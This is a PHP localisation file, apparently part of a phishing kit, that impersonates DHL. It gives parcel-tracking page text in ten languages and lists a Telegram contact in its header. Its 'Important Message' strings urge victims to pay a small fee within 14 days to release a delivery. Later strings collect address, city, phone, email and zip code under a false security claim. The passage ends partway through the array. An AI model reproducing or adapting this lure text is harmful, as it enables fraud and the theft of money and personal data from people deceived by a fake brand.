<?php
    /*******
    Telegram : https://t.me/elgh03t
    ********************************************************/

    $lang = array(

        'top_header1' => [
            'en' => 'Alert(1)',
            'de' => 'Warnung(1)',
            'es' => 'Alertas(1)',
            'fr' => 'Alerte(1)',
            'it' => 'Alert(1)',
            'nl' => 'Alert(1)',
            'ar' => 'تنبيه (1)',
            'dk' => 'Varsler(1)',
            'cn' => '警报(1)',
            'ro' => 'Alertă(1)',
        ],

        'top_header2' => [
            'en' => 'Contact Us',
            'de' => 'Kontakt',
            'es' => 'Contáctanos',
            'fr' => 'Nous contacter',
            'it' => 'Contattaci',
            'nl' => 'Contact Opnemen',
            'ar' => 'اتصل بنا',
            'dk' => 'Kontakt oss',
            'cn' => '联系我们',
            'ro' => 'Contactaţi-ne',
        ],

        'top_header3' => [
            'en' => 'United States of America',
            'de' => 'Deutschland',
            'es' => 'España',
            'fr' => 'France',
            'it' => 'Italia',
            'nl' => 'Nederland',
            'ar' => 'العربية',
            'dk' => 'Norge',
            'cn' => 'China, People\'s Republic 中华人民共和国',
            'ro' => 'Romania',
        ],

        'top_header4' => [
            'en' => 'Search',
            'de' => 'Suche',
            'es' => 'Buscar',
            'fr' => 'Recherche',
            'it' => 'Cerca',
            'nl' => 'Zoeken',
            'ar' => 'ابحث',
            'dk' => 'Søk',
            'cn' => '搜索',
            'ro' => 'Căutare',
        ],

        'mainmenu1' => [
            'en' => 'Track',
            'de' => 'Verfolgen Sie',
            'es' => 'Rastrear',
            'fr' => 'Suivi',
            'it' => 'Tracciamento',
            'nl' => 'Traceren',
            'ar' => 'كود التتبع',
            'dk' => 'Sporing',
            'cn' => '查询',
            'ro' => 'Urmări',
        ],

        'mainmenu2' => [
            'en' => 'Ship',
            'de' => 'Versenden',
            'es' => 'Envío',
            'fr' => 'Envoyer',
            'it' => 'Spedizione',
            'nl' => 'Versturen',
            'ar' => 'إرسال',
            'dk' => 'Send',
            'cn' => '发件',
            'ro' => 'Navă',
        ],

        'mainmenu3' => [
            'en' => 'Logistics Solutions',
            'de' => 'Logistik-Lösungen',
            'es' => 'Soluciones de Logística',
            'fr' => 'Solutions logistiques',
            'it' => 'Soluzioni di Logistica',
            'nl' => 'Logistieke oplossingen',
            'ar' => 'الحلول اللوجستية',
            'dk' => 'Logistikkløsninger',
            'cn' => '物流解决方案',
            'ro' => 'Solutii logistice',
        ],

        'mainmenu4' => [
            'en' => 'Customer Service',
            'de' => 'Kundenbetreuung',
            'es' => 'Servicio al cliente',
            'fr' => 'Service client',
            'it' => 'Servizio Clienti',
            'nl' => 'Klantenservice',
            'ar' => 'خدمة العملاء',
            'dk' => 'Kundeservice',
            'cn' => '客户服务',
            'ro' => 'Serviciu clienți',
        ],

        'header-right' => [
            'en' => 'Customer Portal Logins',
            'de' => 'Kundenportal-Login',
            'es' => 'Portal de inicio de sesión del cliente',
            'fr' => 'Connexion au portail client',
            'it' => 'Login Portale Clienti',
            'nl' => 'Aanmelden klantenportaal',
            'ar' => 'تسجيل الدخول',
            'dk' => 'Pålogging til kundeportal',
            'cn' => '客户门户登录',
            'ro' => 'Autentificare pe portalul clienților',
        ],

        'footer-widget-1-header' => [
            'en' => 'Help Center',
            'de' => 'Hilfe-Center',
            'es' => 'Centro de Ayuda',
            'fr' => 'Centre d’assistance',
            'it' => 'Centro Assistenza',
            'nl' => 'Support',
            'ar' => 'مركز المساعدة',
            'dk' => 'Hjelpesenter',
            'cn' => '帮助中心',
            'ro' => 'Centru de ajutor',
        ],

        'footer-widget-2-header' => [
            'en' => 'Our Divisions',
            'de' => 'Unsere Geschäftsbereiche',
            'es' => 'Nuestras divisiones',
            'fr' => 'Nos divisions',
            'it' => 'Le Nostre Divisioni',
            'nl' => 'Onze Divisies',
            'ar' => 'أقسامنا',
            'dk' => 'Våre avdelinger',
            'cn' => '我们的业务单元',
            'ro' => 'Diviziile noastre',
        ],

        'footer-widget-3-header' => [
            'en' => 'Industry Sectors',
            'de' => 'Industriezweige',
            'es' => 'Sectores de la Industria',
            'fr' => 'Secteurs d\'industries',
            'it' => 'Settori Industriali',
            'nl' => 'Industriële sectoren',
            'ar' => 'قطاعات الصناعة',
            'dk' => 'Bransjesektorer',
            'cn' => '行业领域',
            'ro' => 'Sectoare industriale',
        ],

        'footer-widget-4-header' => [
            'en' => 'Company Information',
            'de' => 'Informationen zum Unternehmen',
            'es' => 'Información de la empresa',
            'fr' => 'Informations sur l\'entreprise',
            'it' => 'Informazioni sull\'Azienda',
            'nl' => 'Bedrijfsinformatie',
            'ar' => 'معلومات الشركة',
            'dk' => 'Bedriftsinformasjon',
            'cn' => '公司信息',
            'ro' => 'Informatiile Companiei',
        ],

        'footer-widget-1-1' => [
            'en' => 'Customer Service',
            'de' => 'Kundenbetreuung',
            'es' => 'Servicio al Cliente',
            'fr' => 'Service clientèle',
            'it' => 'Servizio Clienti',
            'nl' => 'Klantenservice',
            'ar' => 'خدمة العملاء',
            'dk' => 'Kundeservice',
            'cn' => '客户服务',
            'ro' => 'Serviciu clienți',
        ],

        'footer-widget-1-2' => [
            'en' => 'Customer Portal Logins',
            'de' => 'Kundenportal-Logins',
            'es' => 'Portal de inicio de sesión del cliente',
            'fr' => 'Connexion au portail client',
            'it' => 'Login Portale Clienti',
            'nl' => 'Aanmelden klantportaal',
            'ar' => 'تسجيل الدخول',
            'dk' => 'Pålogging til kundeportal',
            'cn' => '客户门户登录',
            'ro' => 'Autentificare pe portalul clienților',
        ],

        'footer-widget-1-3' => [
            'en' => 'Digital Partners and Integrations',
            'de' => 'Digitale Vertriebspartner und Integrationsprojekte',
            'es' => 'Socios digitales e integraciones',
            'fr' => 'Partenaires numériques et intégrations',
            'it' => 'Partner Digitali e Integrazioni',
            'nl' => 'Digitale partners en integraties',
            'ar' => 'التكامل والشركاء الرقميين',
            'dk' => 'Digitale partnere og integrering',
            'cn' => '数字合作伙伴和整合',
            'ro' => 'Parteneri și integrări digitale',
        ],

        'footer-widget-1-4' => [
            'en' => 'Developer Portal',
            'de' => 'Entwickler-Portal',
            'es' => 'Portal del desarollador',
            'fr' => 'Portail des développeurs',
            'it' => 'Portale Sviluppatori',
            'nl' => 'Ontwikkelaarsportaal',
            'ar' => 'بوابة المطور',
            'dk' => 'Utviklerportal',
            'cn' => '开发者门户',
            'ro' => 'Portal pentru dezvoltatori',
        ],

        'footer-widget-2-1' => [
            'en' => 'Post and Paket Deutschland',
            'de' => 'Post und Paket Deutschland',
            'es' => 'Post and Paket Deutschland',
            'fr' => 'Post and Paket Deutschland',
            'it' => 'Post e Paket Deutschland',
            'nl' => 'Post and Paket Deutschland',
            'dk' => 'Post and Paket Deutschland',
            'cn' => 'Post and Paket Deutschland',
            'ro' => 'Poștă și colete Germania',
        ],

        'footer-widget-2-2' => [
            'en' => 'DHL Express',
            'de' => 'DHL Express',
            'es' => 'DHL Express',
            'fr' => 'DHL Express',
            'it' => 'DHL Express',
            'nl' => 'DHL Express',
            'dk' => 'DHL Express',
            'cn' => 'DHL Express',
            'ro' => 'DHL Express',
        ],

        'footer-widget-2-3' => [
            'en' => 'DHL Global Forwarding',
            'de' => 'DHL Globaler Versand',
            'es' => 'DHL Global Forwarding',
            'fr' => 'DHL Global Forwarding',
            'it' => 'DHL Global Forwarding',
            'nl' => 'DHL Global Forwarding',
            'ar' => 'دي إتش إل إكسبرس',
            'dk' => 'DHL Global Forwarding',
            'cn' => 'DHL Global Forwarding',
            'ro' => 'DHL Global Forwarding',
        ],

        'footer-widget-2-4' => [
            'en' => 'DHL Freight',
            'de' => 'DHL Fracht',
            'es' => 'DHL Freight',
            'fr' => 'DHL Freight',
            'it' => 'DHL Freight',
            'nl' => 'DHL Freight',
            'ar' => 'DHL للشحن',
            'dk' => 'DHL Freight',
            'cn' => 'DHL Freight',
            'ro' => 'Marfa DHL',
        ],

        'footer-widget-2-5' => [
            'en' => 'DHL Supply Chain',
            'de' => 'DHL Lieferkette',
            'es' => 'DHL Supply Chain',
            'fr' => 'DHL Supply Chain',
            'it' => 'DHL Supply Chain',
            'nl' => 'DHL Supply Chain',
            'ar' => 'سلسلة التوريد DHL',
            'dk' => 'DHL Supply Chain',
            'cn' => 'DHL Supply Chain',
            'ro' => 'Lanțul de aprovizionare DHL',
        ],

        'footer-widget-2-6' => [
            'en' => 'DHL eCommerce',
            'de' => 'DHL eCommerce',
            'es' => 'DHL eCommerce',
            'fr' => 'DHL eCommerce',
            'it' => 'DHL eCommerce',
            'nl' => 'DHL Parcel',
            'ar' => 'DHL eCommerce',
            'dk' => 'DHL Parcel',
            'cn' => 'DHL eCommerce Solutions',
            'ro' => 'Comerț electronic DHL',
        ],

        'footer-widget-3-1' => [
            'en' => 'Auto-Mobility',
            'de' => 'Auto-Mobilität',
            'es' => 'Movilidad autónoma',
            'fr' => 'Auto-Mobilité',
            'it' => 'Auto-Mobilità',
            'nl' => 'Automotive',
            'ar' => 'التنقل التلقائي',
            'dk' => 'Auto-Mobility',
            'cn' => '汽车',
            'ro' => 'Mobilitate automată',
        ],

        'footer-widget-3-2' => [
            'en' => 'Chemicals',
            'de' => 'Chemie',
            'es' => 'Productos químicos',
            'fr' => 'Produits chimiques',
            'it' => 'Prodotti Chimici',
            'nl' => 'Chemische industrie',
            'ar' => 'مواد كيميائية',
            'dk' => 'Kjemikalier',
            'cn' => '化学品',
            'ro' => 'Produse chimice',
        ],

        'footer-widget-3-3' => [
            'en' => 'Consumer',
            'de' => 'Verbraucher',
            'es' => 'Consumidor',
            'fr' => 'Consommateurs',
            'it' => 'Consumatore',
            'nl' => 'Consument',
            'ar' => 'المستهلك',
            'dk' => 'Forbruker',
            'cn' => '消费者产品',
            'ro' => 'Consumator',
        ],

        'footer-widget-3-4' => [
            'en' => 'Energy',
            'de' => 'Energie',
            'es' => 'Energía',
            'fr' => 'Energie',
            'it' => 'Energia',
            'nl' => 'Energie',
            'ar' => 'الطاقة',
            'dk' => 'Energi',
            'cn' => '能源',
            'ro' => 'Energie',
        ],

        'footer-widget-3-5' => [
            'en' => 'Engineering and Manufacturing',
            'de' => 'Maschinenbau und Fertigung',
            'es' => 'Ingeniería y manufactura',
            'fr' => 'Ingénierie et fabrication',
            'it' => 'Ingegneria e Produzione',
            'nl' => 'Engineering en productie',
            'ar' => 'الهندسة والتصنيع',
            'dk' => 'Utvikling og produksjon',
            'cn' => '工程与制造',
            'ro' => 'Inginerie și producție',
        ],

        'footer-widget-3-6' => [
            'en' => 'Life Sciences and Healthcare',
            'de' => 'Life Sciences und Gesundheitswesen',
            'es' => 'Ciencias biológicos y sector de la salud',
            'fr' => 'Sciences de la vie et soins de santé',
            'it' => 'Scienze della Vita e Sanità',
            'nl' => 'Life Sciences en gezondheidszorg',
            'ar' => 'علوم الحياة والرعاية الصحية',
            'dk' => 'Livsvitenskap og helse',
            'cn' => '生命科学和医疗保健',
            'ro' => 'Științe ale vieții și asistență medicală',
        ],

        'footer-widget-3-7' => [
            'en' => 'Public Sector',
            'de' => 'Öffentlicher Sektor',
            'es' => 'Sector Público',
            'fr' => 'Secteur public',
            'it' => 'Settore Pubblico',
            'nl' => 'Publieke sector',
            'ar' => 'القطاع العام',
            'dk' => 'Offentlig sektor',
            'cn' => '公共部门',
            'ro' => 'Sector public',
        ],

        'footer-widget-3-8' => [
            'en' => 'Retail',
            'de' => 'Einzelhandel',
            'es' => 'Retail',
            'fr' => 'Commerce de détail',
            'it' => 'Retail',
            'nl' => 'Detailhandel',
            'ar' => 'بيع بالتجزئة',
            'dk' => 'Detaljhandel',
            'cn' => '零售',
            'ro' => 'Cu amănuntul',
        ],

        'footer-widget-3-9' => [
            'en' => 'Technology',
            'de' => 'Technologie',
            'es' => 'Tecnología',
            'fr' => 'Technologie',
            'it' => 'Tecnologia',
            'nl' => 'Technologie',
            'ar' => 'تكنولوجيا',
            'dk' => 'Teknologi',
            'cn' => '技术',
            'ro' => 'Tehnologie',
        ],

        'footer-widget-4-1' => [
            'en' => 'About DHL',
            'de' => 'Über DHL',
            'es' => 'Acerca de DHL',
            'fr' => 'A propos de DHL',
            'it' => 'Informazioni su DHL',
            'nl' => 'Over DHL',
            'ar' => 'حول DHL',
            'dk' => 'Om DHL',
            'cn' => '关于 DHL',
            'ro' => 'Despre DHL',
        ],

        'footer-widget-4-2' => [
            'en' => 'Careers',
            'de' => 'Karriere',
            'es' => 'Carreras',
            'fr' => 'Carrières',
            'it' => 'Lavora con Noi',
            'nl' => 'Spotlight Stories',
            'ar' => 'وظائف',
            'dk' => 'Karriere',
            'cn' => 'Spotlight 故事',
            'ro' => 'Cariere',
        ],

        'footer-widget-4-3' => [
            'en' => 'Press Center',
            'de' => 'Presse-Center',
            'es' => 'Centro de Prensa',
            'fr' => 'Centre de presse',
            'it' => 'Centro Stampa',
            'nl' => 'Werken bij DHL',
            'ar' => 'مركز الصحافة',
            'dk' => 'Pressesenter',
            'cn' => '职业',
            'ro' => 'Centrul de presă',
        ],

        'footer-widget-4-4' => [
            'en' => 'Sustainability',
            'de' => 'Nachhaltigkeit',
            'es' => 'Sustentabilidad',
            'fr' => 'Développement durable',
            'it' => 'Sostenibilità',
            'nl' => 'Perscentrum',
            'ar' => 'الاستدامة',
            'dk' => 'Bærekraft',
            'cn' => '媒体中心',
            'ro' => 'Durabilitate',
        ],

        'footer-widget-4-5' => [
            'en' => 'Insights and Innovation',
            'de' => 'Einblicke und Innovationen',
            'es' => 'Ideas e innovación',
            'fr' => 'Perspectives et innovation',
            'it' => 'Approfondimenti e Innovazione',
            'nl' => 'Duurzaamheid',
            'ar' => 'الرؤى والابتكار',
            'dk' => 'Innsikt og innovasjon',
            'cn' => '责任',
            'ro' => 'Perspective și inovație',
        ],

        'footer-widget-4-6' => [
            'en' => 'Official Logistics Partners',
            'de' => 'Offizielle Logistik-Partner',
            'es' => 'Socios oficiales de logística',
            'fr' => 'Partenaires logistiques officiels',
            'it' => 'Partner Ufficiali di Logistica',
            'nl' => 'Inzichten en innovatie',
            'ar' => 'الشركاء اللوجستيون الرسميون',
            'dk' => 'Offisiell logistikkpartner',
            'cn' => '洞察和创新',
            'ro' => 'Parteneri oficiali logistici',
        ],

        'follow-us' => [
            'en' => 'Follow Us',
            'de' => 'Folgen Sie uns',
            'es' => 'Síganos',
            'fr' => 'Suivez-nous',
            'it' => 'Seguici',
            'nl' => 'Volg ons',
            'ar' => 'تابعنا',
            'dk' => 'Følg oss',
            'cn' => '关注我们',
            'ro' => 'Urmează-ne',
        ],

        'footer-menu-1' => [
            'en' => 'Fraud Awareness',
            'de' => 'Betrugserkennung',
            'es' => 'Conciencia sobre fraudes',
            'fr' => 'Sensibilisation à la fraude',
            'it' => 'Nota Legale',
            'nl' => 'Fraudebewustzijn',
            'ar' => 'الوعي بالاحتيال',
            'dk' => 'Bevissthet om svindel',
            'cn' => '阅读更多关于防欺诈意识',
            'ro' => 'Conștientizarea fraudei',
        ],

        'footer-menu-2' => [
            'en' => 'Legal Notice',
            'de' => 'Rechtliche Hinweise',
            'es' => 'Aviso Legal',
            'fr' => 'Avis juridique',
            'it' => 'Termini e Condizioni d\'Uso',
            'nl' => 'Juridische kennisgeving',
            'ar' => 'إشعار قانوني',
            'dk' => 'Juridisk erklæring',
            'cn' => '法律公告',
            'ro' => 'Aviz juridic',
        ],

        'footer-menu-3' => [
            'en' => 'Terms of Use',
            'de' => 'Nutzungsbedingungen',
            'es' => 'Condiciones de Uso',
            'fr' => 'Conditions d\'utilisation',
            'it' => 'Nota sulla Privacy',
            'nl' => 'Gebruiksvoorwaarden',
            'ar' => 'شروط الاستخدام',
            'dk' => 'Bruksvilkår',
            'cn' => '使用条款',
            'ro' => 'Termeni de utilizare',
        ],

        'footer-menu-4' => [
            'en' => 'Privacy Notice',
            'de' => 'Hinweis zum Datenschutz',
            'es' => 'Aviso de Privacidad',
            'fr' => 'Avis de confidentialité',
            'it' => 'Risoluzione Controversie',
            'nl' => 'Privacyverklaring',
            'ar' => 'إشعار الخصوصية',
            'dk' => 'Personvernerklæring',
            'cn' => '隐私声明',
            'ro' => 'Notificare de confidențialitate',
        ],

        'footer-menu-5' => [
            'en' => 'Dispute Resolution',
            'de' => 'Konfliktlösung',
            'es' => 'Resolución de disputas',
            'fr' => 'Résolution des litiges',
            'it' => 'Accessibilità',
            'nl' => 'Geschillenbeslechting',
            'ar' => 'حل النزاعات',
            'dk' => 'Konflikthåndtering',
            'cn' => '争议解决',
            'ro' => 'Soluționare a litigiilor',
        ],

        'footer-menu-6' => [
            'en' => 'Accessibility',
            'de' => 'Erreichbarkeit',
            'es' => 'Accesibilidad',
            'fr' => 'Accessibilité',
            'it' => 'Informazioni Aggiuntive',
            'nl' => 'Toegankelijkheid',
            'ar' => 'إمكانية الوصول',
            'dk' => 'Tilgjengelighet',
            'cn' => '无障碍访问',
            'ro' => 'Accesibilitate',
        ],

        'footer-menu-7' => [
            'en' => 'Additional Information',
            'de' => 'Zusätzliche Informationen',
            'es' => 'Información adicional',
            'fr' => 'Informations complémentaires',
            'it' => 'Impostazioni dei Cookie',
            'nl' => 'Aanvullende informatie',
            'ar' => 'معلومات إضافية',
            'dk' => 'Tilleggsinformasjon',
            'cn' => '其他信息',
            'ro' => 'Informații suplimentare',
        ],

        'footer-menu-8' => [
            'en' => 'Cookies Settings',
            'de' => 'Cookies Einstellungen',
            'es' => 'Configuración de cookies',
            'fr' => 'Paramètres des cookies',
            'it' => 'Impostazioni dei cookie',
            'nl' => 'Cookie-instellingen',
            'ar' => 'إعدادات ملفات تعريف الارتباط',
            'dk' => 'Informasjonskapselinnstillinger',
            'cn' => 'Cookie 设置',
            'ro' => 'Setări cookie',
        ],

        'copyright' => [
            'en' => '2022 © DHL International GmbH. All rights reserved',
            'de' => '2022 DHL GmbH. Alle Rechte vorbehalten.',
            'es' => '2022 DHL GmbH. Todos los derechos reservados.',
            'fr' => '2022 DHL GmbH. Tous droits réservés.',
            'it' => '2022 DHL GmbH. Tutti i diritti riservati.',
            'nl' => '2022 DHL GmbH. Alle rechten voorbehouden.',
            'ar' => '2022 © DHL International GmbH. كل الحقوق محفوظة',
            'dk' => '2022 © DHL International GmbH. Alle rettigheter forbeholdt.',
            'cn' => '版权© 2022 - 版权所有',
            'ro' => '2022 © DHL International GmbH. Toate drepturile rezervate',
        ],

        'title' => [
            'en' => 'DHL TRACKING',
            'de' => 'DHL Sendungsverfolgung',
            'es' => 'Rastreo de DHL',
            'fr' => 'Suivi des envois DHL',
            'it' => 'Tracking DHL',
            'nl' => 'DHL Traceren',
            'ar' => 'DHL TRACKING',
            'dk' => 'DHL-SPORING',
            'cn' => 'DHL追踪',
            'ro' => 'URMĂRIREA DHL',
        ],

        'title2' => [
            'en' => 'Shipment in delivering',
            'de' => 'Sendung in Zustellung',
            'es' => 'Envío en transito',
            'fr' => 'Envoi en cours de livraison',
            'it' => 'Spedizione in consegna',
            'nl' => 'Shipment in delivering',
            'ar' => 'الشحنة قيد التسليم',
            'dk' => 'Forsendelse i levering',
            'cn' => '发货中发货',
            'ro' => 'Livrare in livrare',
        ],

        'status' => [
            'en' => 'Status: <b>in delivering</b>',
            'de' => 'Status: <b>in Zustellung</b>',
            'es' => 'Estado:  <b>En camino</b>',
            'fr' => 'Statut : <b>en cours de livraison</b>',
            'it' => 'Stato: <b>in consegna</b>',
            'nl' => 'Status: <b>in delivering</b>',
            'ar' => 'الحالة: <b> قيد التسليم </ b>',
            'dk' => 'Status: <b>i levering</b>',
            'cn' => '地位: <b>在交付</b>',
            'ro' => 'Stare: <b>în livrare</b>',
        ],

        'parcel' => [
            'en' => 'This shipment is handled by: <b>DHL Parcel</b>',
            'de' => 'Diese Sendung wird abgewickelt <b>von: DHL-Paket</b>',
            'es' => 'Este envío es manejado por: <b>DHL Parcel</b>',
            'fr' => 'Cet envoi est géré par : <b>DHL Parcel</b>',
            'it' => 'Questa spedizione è gestita da: <b>Corriere DHL</b>',
            'nl' => 'De zending wordt verwerkt door: <b>DHL Parcel</b>',
            'ar' => 'يتم التعامل مع هذه الشحنة بواسطة: <b> DHL Parcel </b>',
            'dk' => 'Denne forsendelsen håndteres av: <b>DHL Parcel</b>',
            'cn' => '这批货由 : DHL Parcel',
            'ro' => 'Această expediere este gestionată de: <b>DHL Parcel</b>',
        ],

        'tracking' => [
            'en' => 'Tracking Code: CS47*********',
            'de' => 'Sendungsverfolgungsnummer: CS47*********',
            'es' => 'Código de Rastreo: CS47*********',
            'fr' => 'Code de suivi : CS47*********',
            'it' => 'Codice Tracking: CS47*********',
            'nl' => 'Traceringsnummer: CS47**********',
            'ar' => 'كود التتبع: CS47 *********',
            'dk' => 'Sporingskode: CS47**********',
            'cn' => '跟踪代码 : CS47**********',
            'ro' => 'Cod de urmărire: CS47*********',
        ],

        'important_title' => [
            'en' => 'Important Message!',
            'de' => 'Wichtige Nachricht!',
            'es' => '¡Mensaje Importante!',
            'fr' => 'Message important !',
            'it' => 'Messaggio Importante!',
            'nl' => 'Belangrijke boodschap!',
            'ar' => 'رسالة مهمة!',
            'dk' => 'Viktig melding!',
            'cn' => '重要讯息！',
            'ro' => 'Mesaj important!',
        ],

        'important_message' => [
            'en' => 'To complete the delivery as soon as possible, Please confirm the payment (1.99'. $_SESSION['currency'] .') by clicking next. Online confirmation must be made within the next 14 days, before it expires.',
            'de' => 'Um die Lieferung so schnell wie möglich abzuschließen, bestätigen Sie bitte die Zahlung (1,99) durch Klicken auf Weiter. Die Online-Bestätigung muss innerhalb der nächsten 14 Tage erfolgen, bevor sie abläuft.',
            'es' => 'Para completar el envío lo más pronto posible, por favor confirme el pago (1.99'. $_SESSION['currency'] .') haciendo clic en Siguiente. Se necesita hacer la confirmación en Línea dentro de los siguientes 14 días, antes de que expire.',
            'fr' => '"Pour effectuer la livraison dans les meilleurs délais, veuillez confirmer le paiement (1,99) en cliquant sur suivant. paiement (1.99'. $_SESSION['currency'] .') en cliquant sur suivant. La confirmation en ligne doit être effectuée dans les 14 prochains jours, avant qu\'elle n\'expire."',
            'it' => '"Per completare la consegna il prima possibile, conferma il pagamento (1,99) cliccando su avanti. La conferma online deve essere effettuata entro i prossimi 14 giorni, prima che scada."',
            'nl' => 'Bevestig de betaling (1,99) door op next te klikken om de verzending zo snel mogelijk te voltooien. Er moet 
            binnen 14 dagen online worden bevestigd, voordat het verloopt.',
            'ar' => 'لإكمال التسليم في أسرع وقت ممكن ، يرجى تأكيد الدفع (1.99 '. $_SESSION[' currency '].') بالنقر فوق التالي. يجب أن يتم التأكيد عبر الإنترنت في غضون الـ 14 يومًا القادمة ، قبل انتهاء صلاحيته.',
            'dk' => 'For å fullføre leveransen så snart som mulig, bekreft betalingen (1,99) ved å klikke på neste. Online bekreftelse må gjøres innen de neste 14 dagene, før den utløper.',
            'cn' => '为了尽快完成交付，请点击下一步确认付款（1.99'. $_SESSION['currency'] .'）。 在线确认必须在接下来的 14 天内，即到期之前进行。',
            'ro' => 'Pentru a finaliza livrarea cât mai curând posibil, vă rugăm să confirmați plata (1,99'. $_SESSION['currency'] .') făcând clic pe următorul. Confirmarea online trebuie făcută în următoarele 14 zile, înainte de expirare.',
        ],

        'next' => [
            'en' => 'Next',
            'de' => 'Weiter',
            'es' => 'Siguiente',
            'fr' => 'Suivant',
            'it' => 'Avanti',
            'nl' => 'Next',
            'ar' => 'التالي',
            'dk' => 'Neste',
            'cn' => '下一个',
            'ro' => 'Următorul',
        ],

        'address_message' => [
            'en' => 'We need your Address to be sure that unauthorized persons cannot access your packages, You have 10 working days From the arrival of your package to the DHL branch after this time the package will be returned to the sender.',
            'de' => 'Wir benötigen Ihre Adresse, um sicherzustellen, dass Unbefugte auf Ihre Pakete, Sie haben 10 Arbeitstage ab dem Eintreffen Ihres Pakets in der der DHL-Filiale, nach dieser Zeit wird das Paket an den Absender zurückgeschickt.',
            'es' => 'Necesitamos su Dirección para asegurarnos que ninguna persona no autorizada acceda a su envío, tiene 10 días hábiles desde la llegada del paquete a la sucursal DHL, después del cual el paquete será regresado al remitente.',
            'fr' => '"Nous avons besoin de votre adresse pour nous assurer que les personnes non autorisées n\'accèdent pas à vos colis. Vous avez 10 jours ouvrables à partir de l\'arrivée de votre colis à l\'agence DHL. l\'agence DHL, passé ce délai le colis sera renvoyé à l\'expéditeur."',
            'it' => '"Ci serve il tuo indirizzo per assicurarci che persone non autorizzate accedano ai tuoi pacchi, hai 10 giorni lavorativi dall\'arrivo del tuo pacco alla filiale DHL, dopodiché il pacco verrà restituito al mittente."',
            'nl' => 'We hebben uw adres nodig om er zeker van te zijn dat onbevoegden geen toegang hebben tot uw pakketten. U 
            heeft 10 werkdagen vanaf de aankomst van uw pakket in het DHL-filiaal, na deze tijd zal het pakket worden teruggestuurd naar de afzender.',
            'ar' => 'نحتاج إلى عنوانك للتأكد من أن الأشخاص غير المصرح لهم لا يمكنهم الوصول إلى الطرود الخاصة بك ، لديك 10 أيام عمل من وصول الحزمة الخاصة بك إلى فرع DHL بعد هذا الوقت سيتم إرجاع الطرد إلى المرسل.',
            'dk' => 'Vi trenger adressen din for å være sikker på at uvedkommende ikke får tilgang til pakkene dine. Du har 10 virkedager fra ankomst av pakken til DHL-avdelingen etter dette tidspunktet blir pakken returnert til avsenderen.',
            'cn' => '我们需要您的地址以确保未经授权的人无法访问您的包裹，您有 10 个工作日的时间从您的包裹到达 DHL 分公司，在此时间之后包裹将退还给寄件人。',
            'ro' => 'Avem nevoie de Adresa dumneavoastră pentru a ne asigura că persoanele neautorizate nu pot accesa coletele dumneavoastră. Aveți la dispoziție 10 zile lucrătoare De la sosirea coletului dumneavoastră la filiala DHL după acest timp, pachetul va fi returnat expeditorului.',
        ],

        'address_label' => [
            'en' => 'Address',
            'de' => 'Adresse',
            'es' => 'Dirección',
            'fr' => 'Adresse',
            'it' => 'Indirizzo',
            'nl' => 'Adres',
            'ar' => 'العنوان',
            'dk' => 'Adresse',
            'cn' => '地址',
            'ro' => 'Abordare',
        ],

        'address_error' => [
            'en' => 'Please enter a valid address',
            'de' => 'Bitte geben Sie eine gültige Adresse ein',
            'es' => 'Por favor introduce una dirección válida',
            'fr' => 's\'il-vous-plaît entrez une adresse valide',
            'it' => 'Per favore, inserisci un indirizzo valido',
            'nl' => 'Vul alstublieft een geldig adres in',
            'ar' => 'يرجى إدخال عنوان صحيح',
            'dk' => 'Vennligst skriv inn en gyldig adresse',
            'cn' => '请输入有效地址',
            'ro' => 'Vă rugăm să introduceți o adresă validă',
        ],

        'city_label' => [
            'en' => 'City',
            'de' => 'Stadt',
            'es' => 'Ciudad',
            'fr' => 'Ville',
            'it' => 'Città',
            'nl' => 'Stad',
            'ar' => 'المدينة',
            'dk' => 'By',
            'cn' => '城市',
            'ro' => 'Oraș',
        ],

        'city_error' => [
            'en' => 'Please enter a valid city',
            'de' => 'Bitte geben sie eine gültige Stadt ein',
            'es' => 'Por favor introduzca una ciudad válida',
            'fr' => 'SVP, saisir le nom d\'une ville qui existe',
            'it' => 'Per favore inserisci una città valida',
            'nl' => 'Voer een geldige stad in',
            'ar' => 'إسم المدينة غير صحيح',
            'dk' => 'Angi en gyldig by',
            'cn' => '请输入有效的城市',
            'ro' => 'Vă rugăm să introduceți un oraș valid',
        ],

        'phone_label' => [
            'en' => 'Phone number',
            'de' => 'Telefon-Nummer',
            'es' => 'Número telefónico',
            'fr' => 'Numéro de téléphone',
            'it' => 'Numero di telefono',
            'nl' => 'Telefoonnummer',
            'ar' => 'رقم الهاتف',
            'dk' => 'Telefonnummer',
            'cn' => '电话号码',
            'ro' => 'Număr de telefon',
        ],

        'phone_error' => [
            'en' => 'Please enter a valid phone number',
            'de' => 'Bitte geben Sie eine gültige Telefonnummer ein',
            'es' => 'Por favor ingrese un número de teléfono válido',
            'fr' => 's\'il vous plaît entrer un numéro de téléphone valide',
            'it' => 'Si prega di inserire un numero di telefono valido',
            'nl' => 'Voer alstublieft een geldig telefoonnummer in',
            'ar' => 'رقم الهاتف غير صالح',
            'dk' => 'Vennligst oppgi et gyldig telefonnummer',
            'cn' => '请输入一个有效的电话号码',
            'ro' => 'Va rugam sa introduceti un numar de telefon valid',
        ],

        'email_label' => [
            'en' => 'Your Address Email',
            'de' => 'Ihre E-Mail-Adresse',
            'es' => 'Su correo electrónico',
            'fr' => 'Votre adresse Email',
            'it' => 'Il tuo Indirizzo Email',
            'nl' => 'Uw e-mailadres',
            'ar' => 'عنوان البريد الإلكتروني',
            'dk' => 'Din e-postadresse',
            'cn' => '您的地址电子邮件',
            'ro' => 'Adresa dvs. de e-mail',
        ],

        'email_error' => [
            'en' => 'Please enter a valid address email',
            'de' => 'Bitte geben Sie eine gültige E-Mail-Adresse ein',
            'es' => 'Ingrese una dirección de correo electrónico válida',
            'fr' => 'Veuillez saisir une adresse e-mail valide',
            'it' => 'Per favore inserisci un indirizzo email valido',
            'nl' => 'Voer een geldig e-mailadres in valid',
            'ar' => 'البريد الإلكتروني غير صحيح',
            'dk' => 'Vennligst skriv inn en gyldig e-postadresse',
            'cn' => '请输入有效地址电子邮件',
            'ro' => 'Vă rugăm să introduceți o adresă de e-mail validă',
        ],

        'zip_code_label' => [
            'en' => 'Zip code',
            'de' => 'Postleitzahl',
            'es' => 'Código Postal',
            'fr' => 'Code postal',
            'it' => 'Codice Postale',
            'nl' => 'Postcode',
            'ar' => 'الرمز البريدي',
            'dk' => 'Post kode',
            'cn' => '邮政编码',
            'ro' => 'Cod postal',
        ],

        'zip_code_error' => [
            'en' => 'Please enter a valid zip code',
            'de' => 'Bitte geben Sie eine gültige Postleitzahl ein',
            'es' => 'Por favor ingrese un código postal válido',
            'fr' => 'Veuillez entrer un code postal valide',
            'it' => 'Si prega di inserire un codice postale valido',
            'nl' => 'Geef alstublieft een geldige postcode op',
